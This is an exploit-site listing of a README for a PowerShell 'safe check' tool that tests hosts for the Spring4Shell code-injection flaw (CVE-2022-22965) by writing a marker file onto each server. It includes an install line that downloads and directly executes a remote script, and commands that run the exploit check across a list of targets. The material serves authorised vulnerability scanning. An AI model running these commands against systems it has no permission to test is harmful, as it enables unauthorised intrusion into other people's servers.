Exploit for Code Injection in Vmware Spring Framework CVE-2022-22965

## https://sploitus.com/exploit?id=0126EBDA-4ED9-50FA-BDE5-873011FCD9B6
# Invoke-CVE-2022-22965-SafeCheck
PowerShell port of [CVE-2022-22965 by colincowie's original python version](https://github.com/colincowie/Safer_PoC_CVE-2022-22965).

## Install:
```
iex((iwr https://raw.githubusercontent.com/daniel0x00/Invoke-CVE-2022-22965-SafeCheck/main/Invoke-CVE202222965-SafeCheck.ps1 -UseBasicParsing).content)
```

## Usage:

```
# Injects file 'CVE_2022_22965_exploited.txt' on the server:
$Output = Get-Content targets.txt | ForEach-Object { Invoke-CVE202222965-SafeCheck -Url "https://$_" }

# Outputs vulnerable items only:
$Output | Where-Object {$_.url_content -match 'CVE_2022_22965 was sucessfully exploited' -or $_.base_content -match 'CVE_2022_22965 was sucessfully exploited'}
```

### With parallelism:

NOTE: Requires you place the script locally on `C:\scripts\Invoke-CVE-2022-22965-SafeCheck.ps1` or elsewhere.

```
$Output = Get-Content targets.txt | ForEach-Object -ThrottleLimit 4 -Parallel { . C:\scripts\Invoke-CVE-2022-22965-SafeCheck.ps1; Invoke-CVE202222965-SafeCheck -Url "https://$_" }
$Output | Where-Object {$_.url_content -match 'CVE_2022_22965 was sucessfully exploited' -or $_.base_content -match 'CVE_2022_22965 was sucessfully exploited'}
```

Suggestion: run the script twice against the target with a 2' difference between requests.